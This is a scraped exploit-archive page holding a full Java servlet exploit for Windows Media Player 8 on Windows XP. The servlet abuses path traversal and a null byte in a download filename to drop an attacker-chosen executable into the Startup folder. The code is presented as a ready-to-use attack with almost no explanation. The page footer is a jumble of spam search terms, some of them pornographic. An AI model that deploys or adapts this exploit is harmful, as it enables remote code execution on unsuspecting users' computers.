about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Microsoft Windows Media Player 8.0 Remote Exploit (Java) for windows XP




2003-05-08 Microsoft Windows Media Player 8.0 Remote Exploit (Java) for windows XP
import javax.servlet.http.HttpServlet; 
import javax.servlet.http.HttpServletRequest; 
import javax.servlet.http.HttpServletResponse; 
import javax.servlet.ServletException; 
import javax.servlet.ServletOutputStream; 
import java.io.*; 

/** 
* 
* Microsoft media player 8 Exploit for windows XP English and French
versions 
* It will drop a file in the startup folder 
* modify web.xml to change what will be uploaded 
* @author Jelmer Kuperus 
* 
*/ 

public class MediaPlayerExploit extends HttpServlet { 

private static final int BUFFER_SIZE = 1024; 

private static final String[] paths = new String[] { 
"%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and
%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5c", //
English 
"%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and
%20Settings%5CAll%20Users%5CMenu
Démarrer%5CProgrammes%5Démarrage%5c"
 // French 
}; 

private String payload; 


public void init() throws ServletException { 
payload = getInitParameter("executable"); 
} 

public void 
doGet(HttpServletRequest request, HttpServletResponse response) throws 
ServletException, IOException { 

int language = 0; // default to english 

try { 
language = Integer.parseInt(request.getParameter("language")); 
} catch (NumberFormatException ignored) {} 

String path = paths[language]; 

File file = new File(payload); 

ServletOutputStream sos = response.getOutputStream(); 

response.setContentType("application/download"); 
response.setHeader("Content-Disposition","filename=" +
path + file.getName() + "%00.wmz"); 

BufferedInputStream bis = new BufferedInputStream(new
FileInputStream(file)); 
BufferedOutputStream bos = new BufferedOutputStream(sos); 

byte buffer[] = new byte[BUFFER_SIZE]; 

int datalength = 0; 
while ( (datalength = bis.read(buffer,0,BUFFER_SIZE)) > 0) { 
bos.write(buffer,0,datalength); 
} 
bis.close(); 
bos.close(); 
} 

public void 
doPost(HttpServletRequest request, HttpServletResponse response) throws
ServletException, 
IOException { 
doGet(request, response); 
} 

} 
securitydot.net - 2003-05-08

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 18:38:03 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
WWW.SEX 89 maxcpm.inf www.catky. all cartoo php+advanc www.sex oc Nametha se Searching tamilsdex www.indone PORNO KLIP Crack Data www.sex oc news for C masalamovi bangla des free vedio Bokep pilm skandal ay cgi+comman www.pbxoa. ApacheMod_ 200+%252Fc View wallp driver not ip board 2 Video x po seval WWW.WORLDS ip board 2 creative php-nuke+2 Nudeindian www.zyjr.n www.americ SEXPICTURE t653t perlio ventrilo_2 sexy ahmed Popibunga indo+sex+g /search/ex se x y b u Sexy pictu Www.89.c0m www.redwl. IceWarp We news for C family gir